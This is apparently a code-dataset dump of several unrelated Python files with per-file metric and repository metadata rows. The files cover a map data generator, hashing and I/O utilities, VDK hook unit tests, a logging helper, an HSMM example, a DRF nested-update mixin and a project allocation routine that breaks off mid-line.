def __init__(self, x, y, batch_size=1, shuffle=True, seed=0,
ng=None, smoothing = None, map_size = 512,
y_shape = (2,), augment = False, scale = 60*3.5,
d = None, from_files=False):
"""Initialize data generator."""
self.x, self.y = x, y
self.from_files = from_files
self.d = d
self.batch_size = batch_size
self.x_shape, self.y_shape = (map_size, map_size, 1), y_shape
self.shuffle = shuffle
self.augment = augment
self.seed = seed
self.rng = np.random.RandomState(self.seed)
if not from_files:
assert x.shape[1] == x.shape[2] # maps must be square
self.A_pix = (float(scale)/map_size)**2
self.ng = ng
self.smoothing = smoothing
self.scale = float(scale)
self.n_data = len(x)
self.n_steps = len(x)//batch_size + (len(x) % batch_size > 0)
self.i = 0
self.reset_indices_and_reshuffle(force=True)
def reset_indices_and_reshuffle(self, force=False):
"""Reset indices and reshuffle images when needed."""
if self.i == self.n_data or force:
if self.shuffle:
self.index = self.rng.permutation(self.n_data)
else:
self.index = np.arange(self.n_data)
self.i = 0
def next(self):
"""Get next batch of images."""
x = np.zeros((self.batch_size,)+self.x_shape)
y = np.zeros((self.batch_size,)+self.y_shape)
for i in range(self.batch_size):
x[i],y[i] = self.next_one()
return x,y
def next_one(self):
"""Get next 1 image."""
# reset index, reshuffle if necessary
self.reset_indices_and_reshuffle()
# get next x
if not self.from_files: # simply index from array
x = self.x[self.index[self.i]]
else: # load from file
fn = str(self.x[self.index[self.i]]) + '.npy'
x = np.load(os.path.join(self.d, fn))
x = self.process_map(x)
y = self.y[[self.index[self.i]]]
self.i += 1 # increment counter
return x, y
def process_map(self, x_in):
"""Process data."""
x = np.array([x_in],copy=True)
if self.augment: # flip and transpose
x = aug_ims(x, self.rng.rand()>0.5, self.rng.rand()>0.5,
self.rng.rand()>0.5)
if self.ng: # add noise if ng is not None
x = add_shape_noise(x, self.A_pix, self.ng, self.rng)
if self.smoothing: # smooth if smoothing is not None
x[0,:,:,0] = smooth(x[0,:,:,0], self.smoothing, self.scale)
return x
def predict_on_generator(model, datagen, augment):
"""Predict on data generator with augmentation."""
datagen.reset_indices_and_reshuffle(force=True)
y_true, y_pred = [],[]
for i in range(datagen.n_data):
xi,yi = datagen.next()
y_true.append(yi)
y_pred_tmp = np.zeros(yi.shape)
if augment:
for ai in [0,1]:
for aj in [0,1]:
for ak in [0,1]:
y_pred_tmp += model.predict_on_batch(
aug_ims(xi,ai,aj,ak))
y_pred.append(y_pred_tmp/8.)
else:
y_pred.append(model.predict_on_batch(xi))
y_true = np.vstack(y_true)
y_pred = np.vstack(y_pred)
return y_true, y_pred
def aug_ims(ims, fliplr=0, flipud=0, T=0):
"""Augment images with flips and transposition."""
ims_aug = np.array(ims, copy=True)
for i in range(len(ims_aug)):
if fliplr: # flip left right
ims_aug[i] = np.fliplr(ims_aug[i])
if flipud: # flip up down
ims_aug[i] = np.flipud(ims_aug[i])
if T: # transpose
ims_aug[i,:,:,0] = ims_aug[i,:,:,0].T
return ims_aug
def add_shape_noise(x, A, ng, rng=None, sige=0.4):
"""Add shape noise"""
sigpix = sige / (2 * A * ng)**0.5 # final pixel noise scatter
# add shape noise to map
if rng: # use given random generator
return x + rng.normal(loc=0, scale=sigpix, size=x.shape)
else: # or just a random noise
return x + np.random.normal(loc=0, scale=sigpix, size=x.shape)
def smooth(x, smoothing_scale_arcmin, map_size_arcmin):
"""Smooth by Gaussian kernel."""
# smoothing kernel width in pixels instead of arcmins
map_size_pix = x.shape[0]
s = (smoothing_scale_arcmin * map_size_pix) / map_size_arcmin
# cut off at: 6 sigma + 1 pixel
    # for large smoothing scales and an odd pixel count
cutoff = 6 * int(s+1) + 1
return cv2.GaussianBlur(x, ksize=(cutoff, cutoff), sigmaX=s, sigmaY=s)
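# --- Usage sketch (added, not from the original file): a quick smoke test,
# assuming maps are stored as (N, map_size, map_size, 1) arrays and that the
# generator class above is the DataGenerator named in its docstring.
if __name__ == '__main__':
    data = np.random.rand(8, 512, 512, 1)    # 8 fake square maps
    labels = np.random.rand(8, 2)             # 2 targets per map
    gen = DataGenerator(data, labels, batch_size=4, ng=30, smoothing=1.0)
    xb, yb = gen.next()                       # xb: (4, 512, 512, 1), yb: (4, 2)
    # with a Keras-style `model`, predictions over the whole set would be:
    # y_true, y_pred = predict_on_generator(model, gen, augment=True)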
| 37.179688
| 87
| 0.604434
| 1,433
| 9,518
| 3.796232
| 0.18702
| 0.023162
| 0.020588
| 0.039706
| 0.332537
| 0.309007
| 0.281066
| 0.263603
| 0.252206
| 0.225
| 0
| 0.014335
| 0.267073
| 9,518
| 255
| 88
| 37.32549
| 0.765482
| 0.165161
| 0
| 0.152439
| 0
| 0
| 0.090136
| 0.021375
| 0
| 0
| 0
| 0
| 0.018293
| 1
| 0.091463
| false
| 0
| 0.02439
| 0
| 0.207317
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1e232b6730dde2945dc690b0f6fddabcc0f6b8b
| 4,683
|
py
|
Python
|
bert/utils/common.py
|
rschoon/bert
|
5aeb394dd7c1fcf5995d2f7cd6a25ef3ac81ce13
|
[
"MIT"
] | null | null | null |
bert/utils/common.py
|
rschoon/bert
|
5aeb394dd7c1fcf5995d2f7cd6a25ef3ac81ce13
|
[
"MIT"
] | null | null | null |
bert/utils/common.py
|
rschoon/bert
|
5aeb394dd7c1fcf5995d2f7cd6a25ef3ac81ce13
|
[
"MIT"
] | null | null | null |
import hashlib
import io
import json
import os
import re
import struct
def decode_bin(s, encoding=None):
if encoding is None:
encoding = "utf-8"
if encoding in ("bin", "binary", "bytes", "raw"):
return s
return s.decode(encoding)
class open_output(object):
def __init__(self, filename, mode="wb"):
self._dirname = os.path.dirname(filename)
self.filename = str(filename)
self._tmpname = self.filename+".tmp"
self.mode = mode
self._fileobj = None
def __enter__(self):
if self._dirname:
os.makedirs(self._dirname, exist_ok=True)
self._fileobj = open(self._tmpname, self.mode)
return self._fileobj
def __exit__(self, type, value, tb):
self.close(value is None)
def close(self, commit=True):
if self._fileobj is not None:
self._fileobj.close()
if commit:
os.rename(self._tmpname, self.filename)
else:
os.unlink(self._tmpname)
self._fileobj = None
def expect_file_mode(mode, _sub_mode_re=re.compile('^(u|g|o)=([rwx]+)$')):
if mode is None or mode == "":
return None
if isinstance(mode, int):
return mode
modes = mode.split(",")
rv = 0
for sm in modes:
m = _sub_mode_re.match(sm)
if not m:
            raise ValueError('Invalid mode value %s in %s' % (sm, mode))
shift = ("o", "g", "u").index(m.group(1))*3
bits = 0
for bi in m.group(2):
bits |= 2**('x', 'w', 'r').index(bi)
rv |= (bits << shift)
return rv
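# Illustration (added): the symbolic form composes per-class permission
# bits, and integers pass through unchanged.
if __name__ == "__main__":
    assert expect_file_mode("u=rw,g=r") == 0o640
    assert expect_file_mode("u=rwx,g=rx,o=r") == 0o754
    assert expect_file_mode(0o600) == 0o600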
def json_hash(name, value):
h = hashlib.new(name)
h.update(json.dumps(value, sort_keys=True).encode('utf-8'))
return h.hexdigest()
def _file_hash(name, filename, chunk_size=2**16):
h = hashlib.new(name)
sz = 0
with open(filename, "rb") as f:
while True:
            chunk = f.read(chunk_size)
if not chunk:
break
sz += len(chunk)
h.update(chunk)
return h, sz
def file_hash(name, filename):
filename = os.fspath(filename)
if os.path.isfile(filename):
h, _ = _file_hash(name, filename)
return h.hexdigest()
h = hashlib.new(name)
dirs = [filename]
while dirs:
dirs = sorted(dirs)
dirname = dirs.pop()
for n in os.listdir(dirname):
fn = os.path.join(dirname, n)
if os.path.isdir(fn):
dirs.append(fn)
else:
fn_u8 = fn.encode('utf-8')
h.update(struct.pack('L', len(fn_u8)))
h.update(fn_u8)
hf, sf = _file_hash(name, fn)
h.update(struct.pack('Q', sf))
h.update(hf.digest())
return h.hexdigest()
def value_hash(name, value):
h = hashlib.new(name)
if isinstance(value, str):
value = value.encode('utf-8')
h.update(value)
return h.hexdigest()
class IOHashWriter(io.IOBase):
def __init__(self, hash_name, fileobj):
if not fileobj.writable():
raise ValueError("IOHashWriter requires writable fileobj")
self._h = hashlib.new(hash_name)
self._inner = fileobj
def digest(self):
return self._h.digest()
def hexdigest(self):
return self._h.hexdigest()
@property
def closed(self):
return self._inner.closed
def close(self):
pass
def fileno(self):
return self._inner.fileno()
    def seek(self, offset, whence=io.SEEK_SET):
raise OSError("Not seekable")
def seekable(self):
return False
def tell(self):
return self._inner.tell()
def readable(self):
return False
def truncate(self, size=None):
raise OSError("Not truncatable")
def writable(self):
return self._inner.writable()
def write(self, b):
self._h.update(b)
return self._inner.write(b)
class TeeBytesWriter(io.RawIOBase):
def __init__(self, *fileobjs):
self.fileobjs = fileobjs
self.offset = 0
def readable(self):
return False
def tell(self):
return self.offset
    def write(self, b):
        self.offset += len(b)
        for f in self.fileobjs:
            f.write(b)
        return len(b)
class IOFromIterable(io.RawIOBase):
def __init__(self, iterable):
self._iter = iter(iterable)
self._pos = 0
    def readinto(self, buf):
        # note: assumes each yielded chunk fits into the provided buffer
        try:
chunk = next(self._iter)
except StopIteration:
return 0
sz = len(chunk)
buf[:sz] = chunk
self._pos += sz
return sz
def tell(self):
return self._pos
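# --- Usage sketch (added; file names are hypothetical). open_output writes
# to "<name>.tmp" and renames it into place on a clean exit, so readers
# never observe a half-written file.
if __name__ == "__main__":
    with open_output("out/data.json") as f:
        f.write(json.dumps({"k": 1}).encode("utf-8"))
    print(file_hash("sha256", "out/data.json"))  # digest of the committed file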
| 23.771574
| 74
| 0.558189
| 599
| 4,683
| 4.230384
| 0.263773
| 0.04341
| 0.044199
| 0.023678
| 0.136938
| 0.066298
| 0.050513
| 0.028414
| 0
| 0
| 0
| 0.006283
| 0.320308
| 4,683
| 196
| 75
| 23.892857
| 0.789821
| 0
| 0
| 0.143791
| 0
| 0
| 0.035028
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.196078
| false
| 0.006536
| 0.039216
| 0.071895
| 0.424837
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1e338fa1474985107d12ea6bcd66b88abed94fc
| 2,924
|
py
|
Python
|
projects/vdk-plugins/airflow-provider-vdk/tests/hooks/test_vdkhook.py
|
vmware/versatile-data-kit
|
c4e10324a4f3203c58079cb18203880f68053f15
|
[
"Apache-2.0"
] | 100
|
2021-10-04T09:32:04.000Z
|
2022-03-30T11:23:53.000Z
|
projects/vdk-plugins/airflow-provider-vdk/tests/hooks/test_vdkhook.py
|
vmware/versatile-data-kit
|
c4e10324a4f3203c58079cb18203880f68053f15
|
[
"Apache-2.0"
] | 208
|
2021-10-04T16:56:40.000Z
|
2022-03-31T10:41:44.000Z
|
projects/vdk-plugins/airflow-provider-vdk/tests/hooks/test_vdkhook.py
|
vmware/versatile-data-kit
|
c4e10324a4f3203c58079cb18203880f68053f15
|
[
"Apache-2.0"
] | 14
|
2021-10-11T14:15:13.000Z
|
2022-03-11T13:39:17.000Z
|
# Copyright 2021 VMware, Inc.
# SPDX-License-Identifier: Apache-2.0
import logging
import unittest
from unittest import mock
from vdk.plugin.control_api_auth.authentication import Authentication
from vdk_provider.hooks.vdk import VDKHook
log = logging.getLogger(__name__)
# Monkey-patch the authentication logic to allow for more granular testing
# of the VDKHook
class PatchedAuth(Authentication):
def read_access_token(self) -> str:
return "test1token"
class TestVDKHook(unittest.TestCase):
@mock.patch.dict(
"os.environ", AIRFLOW_CONN_CONN_VDK="http://https%3A%2F%2Fwww.vdk-endpoint.org"
)
def setUp(self):
self.hook = VDKHook(
conn_id="conn_vdk",
job_name="test_job",
team_name="test_team",
auth=PatchedAuth(),
)
@mock.patch("taurus_datajob_api.api_client.ApiClient.call_api")
def test_start_job_execution(self, mock_call_api):
mock_call_api.return_value = (None, None, {"Location": "job-execution-id-01"})
self.hook.start_job_execution()
assert (
mock_call_api.call_args_list[0][0][0]
== "/data-jobs/for-team/{team_name}/jobs/{job_name}/deployments/{deployment_id}/executions"
and mock_call_api.call_args_list[0][0][1] == "POST"
and mock_call_api.call_args_list[0][0][2]
== {
"team_name": "test_team",
"job_name": "test_job",
"deployment_id": "production",
}
)
@mock.patch("taurus_datajob_api.api_client.ApiClient.request")
def test_cancel_job_execution(self, mocked_api_client_request):
request_url = "https://www.vdk-endpoint.org/data-jobs/for-team/test_team/jobs/test_job/executions/test_execution_id"
self.hook.cancel_job_execution("test_execution_id")
assert mocked_api_client_request.call_args_list[0][0] == ("DELETE", request_url)
@mock.patch("taurus_datajob_api.api_client.ApiClient.deserialize")
@mock.patch("taurus_datajob_api.api_client.ApiClient.request")
def test_get_job_execution_status(self, mocked_api_client_request, _):
request_url = "https://www.vdk-endpoint.org/data-jobs/for-team/test_team/jobs/test_job/executions/test_execution_id"
self.hook.get_job_execution_status("test_execution_id")
assert mocked_api_client_request.call_args_list[0][0] == ("GET", request_url)
@mock.patch("taurus_datajob_api.api_client.ApiClient.deserialize")
@mock.patch("taurus_datajob_api.api_client.ApiClient.request")
def test_get_job_execution_log(self, mocked_api_client_request, _):
request_url = "https://www.vdk-endpoint.org/data-jobs/for-team/test_team/jobs/test_job/executions/test_execution_id/logs"
self.hook.get_job_execution_log("test_execution_id")
assert mocked_api_client_request.call_args_list[0][0] == ("GET", request_url)
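# Added note: the AIRFLOW_CONN_CONN_VDK value above follows Airflow's
# connection-URI convention -- the real endpoint is percent-encoded into
# the host part of the URI. A standard-library check (plus the usual
# entry point for running this file directly):
if __name__ == "__main__":
    from urllib.parse import unquote
    assert unquote("https%3A%2F%2Fwww.vdk-endpoint.org") == "https://www.vdk-endpoint.org"
    unittest.main()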
| 38.986667
| 129
| 0.703146
| 398
| 2,924
| 4.824121
| 0.253769
| 0.05625
| 0.046875
| 0.06875
| 0.544271
| 0.524479
| 0.524479
| 0.524479
| 0.489063
| 0.459896
| 0
| 0.011227
| 0.177497
| 2,924
| 74
| 130
| 39.513514
| 0.78711
| 0.051642
| 0
| 0.173077
| 0
| 0.057692
| 0.332009
| 0.136199
| 0
| 0
| 0
| 0
| 0.076923
| 1
| 0.115385
| false
| 0
| 0.096154
| 0.019231
| 0.269231
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1e3adf84f989f48fb009dcc9e422f44d758219c
| 720
|
py
|
Python
|
skater/util/logger.py
|
RPUTHUMA/Skater
|
317460b88065b41eebe6790e9efdbb0595cbe450
|
[
"UPL-1.0"
] | 718
|
2017-05-19T22:49:40.000Z
|
2019-03-27T06:40:54.000Z
|
skater/util/logger.py
|
quant1729/Skater
|
b46a4abe3465ddc7b19ffc762ad45d1414b060a6
|
[
"UPL-1.0"
] | 114
|
2017-05-24T16:55:59.000Z
|
2019-03-27T12:48:18.000Z
|
skater/util/logger.py
|
quant1729/Skater
|
b46a4abe3465ddc7b19ffc762ad45d1414b060a6
|
[
"UPL-1.0"
] | 121
|
2017-05-22T17:20:19.000Z
|
2019-03-21T15:06:19.000Z
|
"""Funcs for logging"""
import logging
_CRITICAL = logging.CRITICAL
_ERROR = logging.ERROR
_WARNING = logging.WARNING
_INFO = logging.INFO
_DEBUG = logging.DEBUG
_NOTSET = logging.NOTSET
def build_logger(log_level, logger_name, capture_warning=True):
logger = logging.Logger(logger_name)
# All warnings are logged by default
logging.captureWarnings(capture_warning)
logger.setLevel(log_level)
msg_formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s'
)
stream_handler = logging.StreamHandler()
    stream_handler.setFormatter(msg_formatter)
logger.addHandler(stream_handler)
return logger
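# Usage sketch (added; not part of the original module):
if __name__ == '__main__':
    log = build_logger(_INFO, 'skater.demo')
    log.info('logger ready')           # emitted: INFO >= configured level
    log.debug('hidden at INFO level')  # suppressed: DEBUG < INFO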
| 24
| 63
| 0.740278
| 84
| 720
| 6.107143
| 0.452381
| 0.101365
| 0.097466
| 0.109162
| 0.14425
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163889
| 720
| 29
| 64
| 24.827586
| 0.852159
| 0.073611
| 0
| 0.105263
| 0
| 0
| 0.078669
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.052632
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1e6fe5da799ee54688ff5ee8d7c10fc529546e8
| 1,818
|
py
|
Python
|
examples/hsmm-geo.py
|
bikash/pyhsmm
|
94fab0ea66072a639b20163c40db04c18069496c
|
[
"MIT"
] | 1
|
2015-11-08T05:20:39.000Z
|
2015-11-08T05:20:39.000Z
|
examples/hsmm-geo.py
|
bikash/pyhsmm
|
94fab0ea66072a639b20163c40db04c18069496c
|
[
"MIT"
] | null | null | null |
examples/hsmm-geo.py
|
bikash/pyhsmm
|
94fab0ea66072a639b20163c40db04c18069496c
|
[
"MIT"
] | null | null | null |
from __future__ import division
import numpy as np
np.seterr(divide='ignore') # these warnings are usually harmless for this code
from matplotlib import pyplot as plt
import copy, os
import pyhsmm
from pyhsmm.util.text import progprint_xrange
###################
# generate data #
###################
T = 1000
obs_dim = 2
N = 4
obs_hypparams = {'mu_0':np.zeros(obs_dim),
'sigma_0':np.eye(obs_dim),
'kappa_0':0.25,
'nu_0':obs_dim+2}
dur_hypparams = {'alpha_0':10*1,
'beta_0':10*100}
true_obs_distns = [pyhsmm.distributions.Gaussian(**obs_hypparams)
for state in range(N)]
true_dur_distns = [pyhsmm.distributions.GeometricDuration(**dur_hypparams)
for state in range(N)]
truemodel = pyhsmm.models.GeoHSMM(
alpha=6.,
init_state_concentration=6.,
obs_distns=true_obs_distns,
dur_distns=true_dur_distns)
data, labels = truemodel.generate(T)
plt.figure()
truemodel.plot()
temp = np.concatenate(((0,),truemodel.states_list[0].durations.cumsum()))
changepoints = list(zip(temp[:-1], temp[1:]))
changepoints[-1] = (changepoints[-1][0],T) # because last duration might be censored
#########################
# posterior inference #
#########################
Nmax = 25
obs_distns = [pyhsmm.distributions.Gaussian(**obs_hypparams) for state in range(Nmax)]
dur_distns = [pyhsmm.distributions.GeometricDuration(**dur_hypparams) for state in range(Nmax)]
posteriormodel = pyhsmm.models.GeoHSMMPossibleChangepoints(
alpha=6.,
init_state_concentration=6.,
obs_distns=obs_distns,
dur_distns=dur_distns)
posteriormodel.add_data(data,changepoints=changepoints)
for idx in progprint_xrange(50):
posteriormodel.resample_model()
plt.figure()
posteriormodel.plot()
plt.show()
| 25.25
| 95
| 0.669417
| 230
| 1,818
| 5.095652
| 0.408696
| 0.046075
| 0.085324
| 0.064846
| 0.303754
| 0.303754
| 0.295222
| 0.295222
| 0.230375
| 0.230375
| 0
| 0.025914
| 0.172167
| 1,818
| 71
| 96
| 25.605634
| 0.752824
| 0.069857
| 0
| 0.177778
| 0
| 0
| 0.025721
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.133333
| 0
| 0.133333
| 0.044444
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1e7704fa789f92ccdaa67ed757a654c38ed5fda
| 2,644
|
py
|
Python
|
drf_nested/mixins/update_nested_mixin.py
|
promoteinternational/drf-nested
|
0042b9e4c100df4ae43a10684c30348160b39187
|
[
"MIT"
] | 1
|
2020-01-05T07:23:48.000Z
|
2020-01-05T07:23:48.000Z
|
drf_nested/mixins/update_nested_mixin.py
|
promoteinternational/drf-nested
|
0042b9e4c100df4ae43a10684c30348160b39187
|
[
"MIT"
] | null | null | null |
drf_nested/mixins/update_nested_mixin.py
|
promoteinternational/drf-nested
|
0042b9e4c100df4ae43a10684c30348160b39187
|
[
"MIT"
] | 2
|
2019-08-12T07:36:57.000Z
|
2019-11-30T01:40:30.000Z
|
from django.db import transaction
from rest_framework.exceptions import ValidationError
from .base_nested_mixin import BaseNestedMixin
class UpdateNestedMixin(BaseNestedMixin):
@transaction.atomic
def update(self, instance, validated_data):
"""
:param instance:
:param validated_data:
:return:
"""
self._errors = {}
if self._has_nested_fields(validated_data):
validated_data, nested_fields_data = self._get_nested_fields(validated_data, remove_fields=True)
nested_field_types = self.extract_nested_types(nested_fields_data)
# Updating or creating direct relations like ForeignKeys before we create initial instance
for field in nested_field_types["direct_relations"]:
field_name = field.get('name')
field_data = field.get('data')
if isinstance(field_data, dict):
nested_instance = self._update_or_create_direct_relations(field_name, field_data)
validated_data[field.get("original_name")] = nested_instance
elif field_data is None:
validated_data[field.get("original_name")] = field_data
model_instance = super().update(instance, validated_data)
# Updating or creating reversed relations like the models that have the current model as ForeignKeys
# using created initial instance
for field in nested_field_types["reverse_relations"]:
field_name = field.get('name')
field_data = field.get('data')
self._update_or_create_reverse_relation(field_name, field_data, model_instance)
# Updating or creating generic relations using created initial instance
for field in nested_field_types["generic_relations"]:
field_name = field.get('name')
field_data = field.get('data')
self._update_or_create_generic_relation(field_name, field_data, model_instance)
# Updating or creating many-to-many relations using created initial instance
for field in nested_field_types["many_to_many_fields"]:
field_name = field.get('name')
field_data = field.get('data')
self._update_or_create_many_to_many_field(field_name, field_data, model_instance)
if self._errors:
raise ValidationError(self._errors)
else:
model_instance = super().update(instance, validated_data)
model_instance.refresh_from_db()
return model_instance
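# Hypothetical wiring (added; ``Author`` and the import path are assumptions
# for illustration only -- check the package's __init__ for the real path):
#
#     from rest_framework import serializers
#     from drf_nested.mixins import UpdateNestedMixin
#
#     class AuthorSerializer(UpdateNestedMixin, serializers.ModelSerializer):
#         class Meta:
#             model = Author   # a model with nested relations
#             fields = "__all__"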
| 44.066667
| 112
| 0.655825
| 298
| 2,644
| 5.489933
| 0.244966
| 0.071516
| 0.071516
| 0.056235
| 0.496333
| 0.469438
| 0.410147
| 0.355134
| 0.330073
| 0.330073
| 0
| 0
| 0.274962
| 2,644
| 59
| 113
| 44.813559
| 0.853417
| 0.156203
| 0
| 0.27027
| 0
| 0
| 0.05807
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027027
| false
| 0
| 0.081081
| 0
| 0.162162
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1ee53bc0c6e33469f0d38aac5f3576590fc8660
| 14,142
|
py
|
Python
|
allocate.py
|
tomdavsmi/ncl-spa
|
baa714071d18cc388ccc73702d78a53f7096db6e
|
[
"MIT"
] | null | null | null |
allocate.py
|
tomdavsmi/ncl-spa
|
baa714071d18cc388ccc73702d78a53f7096db6e
|
[
"MIT"
] | null | null | null |
allocate.py
|
tomdavsmi/ncl-spa
|
baa714071d18cc388ccc73702d78a53f7096db6e
|
[
"MIT"
] | null | null | null |
import library
import random
import re
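def _firstidx_reference(seq, item):
    """Assumed contract of library.firstidx, inferred from the call sites
    below (added reference sketch only -- allocate() uses the real
    library.firstidx): index of the first occurrence of item in seq,
    or -1 if absent."""
    try:
        return seq.index(item)
    except ValueError:
        return -1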
def allocate(studPrefs,unassignedStudents,lecturerprefs,projLects,lectProjs,lecturercaps,projCaps,randomise,updates,iterationLimit):
# Create projected preference list - first pass; add students not on lecturer's list
for k, v in studPrefs.items():
for project in v:
idx = library.firstidx(lecturerprefs[projLects[project]],k)
if idx == -1:
lecturerprefs[projLects[project]].append(k)
projectedPrefs = {}
# Create projected preference list - second pass; add students to projected list
for k, v in projLects.items():
for student in lecturerprefs[v]:
if library.firstidx(studPrefs[student], k) > -1:
if k not in projectedPrefs:
projectedPrefs.update({k: []})
projectedPrefs[k].append(student)
else:
projectedPrefs[k].append(student)
maxidx = 0
done = 0
iters = 0
projAssignments = dict()
lectAssignments = dict()
studAssignments = dict()
nProj = 0
currentStudent = ""
while done != 1:
iters += 1
if randomise == 1:
random.shuffle(unassignedStudents)
        if iters > iterationLimit and iterationLimit != -1:
            print("Reached the maximum number of iterations ("+str(iterationLimit)+") before convergence")
done = 1
if len(unassignedStudents) > 0:
for value in unassignedStudents:
currentStudent = value
nProj = len(studPrefs[currentStudent])
if nProj > 0:
break
        if nProj > 0: ### We have a student who still has projects in their list - heart of the algorithm
currentProject = studPrefs[currentStudent][0]
currentLecturer = projLects[currentProject]
if currentProject not in projAssignments:
projAssignments.update({currentProject:[]})
projAssignments[currentProject].append(currentStudent)
else:
projAssignments[currentProject].append(currentStudent)
if currentLecturer not in lectAssignments:
lectAssignments.update({currentLecturer:[]})
lectAssignments[currentLecturer].append(currentStudent)
else:
lectAssignments[currentLecturer].append(currentStudent)
studAssignments.update({currentStudent:currentProject})
idx = library.firstidx(unassignedStudents,currentStudent)
unassignedStudents.pop(idx)
if updates == True:
print(str(iters)+" : Assigned "+currentStudent+" to project "+currentProject+" with supervisor "+currentLecturer+"\n")
#Is the project the student was just assigned to overloaded?
if len(projAssignments[currentProject]) > int(projCaps[currentProject]):
maxidx = -1
for value in projAssignments[currentProject]:
idx = library.firstidx(projectedPrefs[currentProject], value)
if idx == -1:
maxidx = idx
worst = value
break
if idx > maxidx:
maxidx = idx
worst = value
if updates == True:
print("Project " + currentProject + " is overloaded. Removing " + worst + ".\n")
idx = library.firstidx(lectAssignments[currentLecturer],worst)
lectAssignments[currentLecturer].pop(idx)
idx = library.firstidx(projAssignments[currentProject],worst)
projAssignments[currentProject].pop(idx)
if worst not in unassignedStudents:
unassignedStudents.append(worst)
if worst in studAssignments:
studAssignments.pop(worst)
#Is the lecturer of the project the student was just assigned to overloaded?
if len(lectAssignments[currentLecturer]) > int(lecturercaps[currentLecturer]):
maxidx = -1
for value in lectAssignments[currentLecturer]:
idx = library.firstidx(lecturerprefs[currentLecturer],value)
if idx == -1:
maxidx = idx
worst = value
break
if idx > maxidx:
maxidx = idx
worst = value
if updates == True:
print("Lecturer " + currentLecturer + " is overloaded. Removing " + worst + ".\n")
idx = library.firstidx(lectAssignments[currentLecturer], worst)
lectAssignments[currentLecturer].pop(idx)
if worst in studAssignments:
idx = library.firstidx(projAssignments[studAssignments[worst]], worst)
projAssignments[studAssignments[worst]].pop(idx)
if worst not in unassignedStudents:
unassignedStudents.append(worst)
if worst in studAssignments:
studAssignments.pop(worst)
#Is the project full?
if len(projAssignments[currentProject]) == int(projCaps[currentProject]):
maxidx = -1
for value in projAssignments[currentProject]:
idx = library.firstidx(projectedPrefs[currentProject], value)
if idx == -1:
maxidx = idx
worst = value
break
if idx > maxidx:
maxidx = idx
worst = value
if updates == True:
print("Project "+currentProject+" is full: removing successors to "+worst)
idx = library.firstidx(projectedPrefs[currentProject],worst)
a = []
if idx == -1 or idx == len(projectedPrefs[currentProject])-1:
pass
else:
for i in range(idx+1,len(projectedPrefs[currentProject])):
a.append(projectedPrefs[currentProject][i])
for i in a:
while True:
idx = library.firstidx(studPrefs[i],currentProject)
if idx > -1:
studPrefs[i].pop(idx)
if idx == -1:
break
#Is the lecturer full?
if len(lectAssignments[currentLecturer]) == int(lecturercaps[currentLecturer]):
maxidx = -1
for value in lectAssignments[currentLecturer]:
idx = library.firstidx(lecturerprefs[currentLecturer], value)
if idx == -1:
maxidx = idx
worst = value
break
if idx > maxidx:
maxidx = idx
worst = value
if updates == True:
print("Lecturer "+currentLecturer+" is full: removing successors to "+worst+"\n")
idx = library.firstidx(lecturerprefs[currentLecturer],worst)
a = []
if idx == -1 or idx == len(lecturerprefs[currentLecturer])-1:
pass
else:
for i in range(idx+1,len(lecturerprefs[currentLecturer])):
a.append(lecturerprefs[currentLecturer][i])
for i in a:
for project in lectProjs[currentLecturer]:
while True:
idx = library.firstidx(projectedPrefs[project], i)
if idx > -1:
projectedPrefs[project].pop(idx)
if idx == -1:
break
while True:
idx = library.firstidx(studPrefs[i],project)
if idx > -1:
studPrefs[i].pop(idx)
if idx == -1:
break
if updates == True:
print(str(iters)+": Remaining students:" + str(unassignedStudents)+"\n-------------\n")
else:
done= 1
else:
done= 1
return {"Student Assignments":studAssignments, "Lecturer Assignments": lectAssignments, "Project Assignments": projAssignments, "Unassigned Students": unassignedStudents}
def random_distribute(unassignedStudents,studAssignments,projAssignments,projCaps,lectAssignments,lecturercaps, lectProjs, projLects, updates):
freeprojects = []
    unassignedStudentsCopy = list(unassignedStudents)  # real copy: the original list is mutated later
freeprojects = library.findFreeProjects(projAssignments, projCaps, lectAssignments, lecturercaps, lectProjs)
if updates == True:
print("***Distributing remaining "+str(len(unassignedStudents))+" students***\n")
if updates == True and len(unassignedStudents) <= len(freeprojects):
print(str(
